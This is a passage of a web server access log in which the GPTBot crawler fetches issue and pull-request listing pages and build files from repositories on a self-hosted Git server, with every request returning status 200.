"/windpacer/AssetPilot/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:18:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11784] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9943] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:18:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=open&type=all" [Client 74.7.227.38] [Length 10115] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:18:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11197] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" -[17/Feb/2026:18:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 11197] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:18:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11340] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:18:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:18:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:18:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:18:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:18:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:18:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:18:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:18:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:18:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 